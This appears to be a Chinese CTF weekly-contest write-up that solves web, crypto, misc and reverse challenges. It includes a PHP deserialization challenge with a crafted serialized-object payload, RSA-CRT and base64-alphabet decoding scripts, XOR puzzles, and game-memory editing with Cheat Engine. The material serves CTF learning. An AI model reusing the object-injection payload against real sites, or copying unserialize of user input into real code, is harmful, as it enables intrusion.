周赛wp3

WEB

鲜衣怒马少年郎，谁人不识理塘王！

顶真

<?php
highlight_file(__FILE__);
include('flag.php');
class SLsec{
    public $name='鍒€涓嶉攱鍒╅┈澶槮';
    public $pass='浣犳嬁浠€涔堝拰鍥涚偣鏂�';
    public $jk=false;
    public function a4(){
        return $this->jk;
    }
    public function a6($ding,$zhen){
        return $this-> name==$ding&&$this->pass==$zhen;
    }
    public function a8(){
        if($this->jk){#$jk为真
            global $flag;
            echo $flag; 
        }else{
           echo "椴滆。鎬掗┈灏戝勾閮庯紝璋佷汉涓嶈瘑鐞嗗鐜嬶紒";}
    }
}
$name=$_GET['name'];
$pass=$_GET['pass'];
if(isset($_GET['name']) && isset($_GET['pass'])){
    $user = unserialize($_POST['user']);
    if($user->a6($name,$pass)){#赋值判断pass传参与两个GET是否相同
        if($user->a4()){#赋值
            $user->a8();}#调用flag
    }else{
        echo "Snow leopards are really hard to ride, so it's better to exchange money for an Audi";
    }}
?>

<?php
highlight_file(__FILE__);
class SLsec{
    public $name='a';
    public $pass='aa';
    public $jk=true;}
  $f=new SLsec();
echo serialize($f);
?>

https://k5hai-1311151548.cos.ap-shanghai.myqcloud.com/https://k5hai-1311151548.cos.ap-shanghai.myqcloud.comimage-20230326200954241.png

play：GET： name=a&pass=aa

POST: user=O:5:"SLsec":3:{s:4:"name";s:1:"a";s:4:"pass";s:2:"aa";s:2:"jk";b:1;}

CRYPTO

babyrsa

from Crypto.Util.number import *
import gmpy2
p= 174900179045398405758362887050510099953351230680589941223587187096927676318250039003867347118828470850766614025136710989402078055968449696991925901611318398319579226096026113980420314613233522410263933804832601250567540744629955554545762144406833636478599885984277733223077146277644459138695484730091497123653
q= 138394168894464614599095635109542670799766048108401527799025178725205133812543876982783399176166727189388896418668604671443249386259427967695540806910521362186865886429031334061503953791903407614931162328753160467494420213786798800975785789856116685244900988587164035039772328579334638131513694977152566697693
dq= 91144988599155922537286812069488697332186431610461674212452885608698963724568088535192289473758461311143377744214326484716015838529829408451331802003020019755397796512654690339237890864185649014688783869167705450325681146031490758620578699998011937814370759561761662578187180465099739857369029748140120600665
dp= 77086099023854203737282939293131883320148165131282183381041486477787447250448637817213304263658092078129814396693072568608252203284383928126276449456687549559196269981593821846047893367155199274005122723844388469454558713530315183683329104798684553606121087426276184813900290984173218215988206302221537366933
c= 15801371432169186780418480692589791195238785876344412995045613608181370212202255665942402417893437199493695445538341476746293760869621577715385796212569911097161252465453342990879413408685475673255790355354475333896669490479548332300912398201417641777563849663680004298227798906936140992367106039486966585574927214313333872682519241375796031187317957899045859494277570277966275262219924901316942847426675912933662265462110997773928571167535352177539455991039999517915239795197245498033201847388365903662518433723721091041449528248327695253818581438003566115867963542838871840099584964228370817957241460684463142116638
​
​
​
I = gmpy2.invert(q,p)
mp = pow(c,dp,p)
mq = pow(c,dq,q)               #求幂取模运算
​
m = (((mp-mq)*I)%p)*q+mq       #求明文公式
​
print( long_to_bytes(m))         #转为十六进制

base？

很简单的base64换表解码。 首先写个python脚本提取编码表

这是提取的编码表：
JKLxNOMyUzVABCDEFGH798PQIacbdefghijklmWXYZ0123456SRTnopqrstuvw+/=

然后编写脚本解码：

import base64
import string
​
str1 = "9nSTaPCu8MimQoamdXmg9qGRIPsXa8wjIQCmQTIngF=="
​
string1 = "JKLxNOMyUzVABCDEFGH798PQIacbdefghijklmWXYZ0123456SRTnopqrstuvw+/="
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
​
print (base64.b64decode(str1.translate(str.maketrans(string1,string2))))

也可以网站解密：

MISC

看不懂的文件

把文件复制到虚拟机，打开终端执行 cat flag就出flag了

flag:SLsec{!2023_Will_Be_Special,2022_Was_Not!}

里在干什莫？

16进制文件是反的很容易看出来

tmp = ''
with open('flag.txt','r') as file: #flag.txt里保存的是反着的16进制文本
    re_str = file.read()
for i in re_str:
   tmp += i.strip()
print(tmp[::-1])
#504B0304140000000800F8BE7956F4507576100000000E00000008000000666C61672E747874AB4D2D2E4A2D4B2DAA4E4E2DF6090600504B01021400140000000800F8BE7956F4507576100000000E000000080024000000000000002000000000000000666C61672E7478740A00200000000000010018001F7EE443325FD901FF777E4A325FD901C6D233C4245FD901504B050600000000010001005A000000360000000000

将输出的16进制010重新读取一下就是flag

你知道什么是xor吗？

这道题是shangu👴赞助的

附件很简单，一个key，一个flag,还有题目的关键描述 ‘xor’

key = 'jaks{qwertyui-opas-dfgh-jklz-xcvbnmqwertu}'
flag = 'óòõëÿ¾»®¿íâë÷ÿñë•îÿ¨ û ÿ¤•¥±ÿ¿ú½®÷öﺮº²¼ÿ'

这道题脑洞很大，所以我就按我的分析来了

首先看key，标准的flag格式，但是前四位被替换成了'jaks'，里面是按照键盘的qwer顺序，最开始分析的是字母在表中的顺序之类的，但是死活凑不出flag就放弃了。

换一条思路，异或具有可逆性，或许’jask‘与’flag‘异或的结果就是我们要找的关键

再看flag这串乱码，先取前四位找一下规律,由于乱码的ascii码值通常是很大的，超出了标准ascii码的范围，我们可以先看一下他的ascii值是多少

还是找不到什么规律，由于xor本质上是二进制比特位之间的操作，我们进一步观察他们的二进制形式

再看’jask‘与’flag‘异或结果的二进制

其实到这里就已经很明显了，

将flag的各位取反再与key异或

脚本

key = 'jaks{qwertyui-opas-dfgh-jklz-xcvbnmqwertu}'
flag = 'óòõëÿ¾»®¿íâë÷ÿñë•îÿ¨ û ÿ¤•¥±ÿ¿ú½®÷öﺮº²¼ÿ'
data = [0xff ^ ord(i) for i in flag]
for i in range(len(data)):
    print(chr(ord(key[i])^data[i]),end='')

最后看一下出题人视角

拿到flag > 与随便打出来的key异或 > 将异或结果按位取反 > 给出附件

REVERSE

re2

程序是有一个upx壳，壳没有魔改可以直接脱

首先是通过循环可以看出来12个总共12位，v4含有转义字符需要去一下，所以这里为了方便直接用ascii码，加密就是找到v4中字符在data_strart 表中的位置，然后将他的ascii减1（其实可以看出来表中的字符就是倒着的ascii码表）

脚本

v4 = [42,70,39,34,78,44,34,40,73,63,43,64]
flag = ''
__data_strart__ = '~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,+*)(\'&%$# !"'
for i in v4:
    flag += chr(__data_strart__.find(chr(i))+1)
    print(flag)
​
​

贪吃蛇

贪吃蛇小游戏来自SWPUCTF 2022 新生赛

反编译可以看到一个v18

这个代码写这里八九不离十可以猜到v18就是分数

ce直接改数值

因为刚开始v18=4，就从4开始扫，分数加一慢慢筛选

改下数值直接就能出flag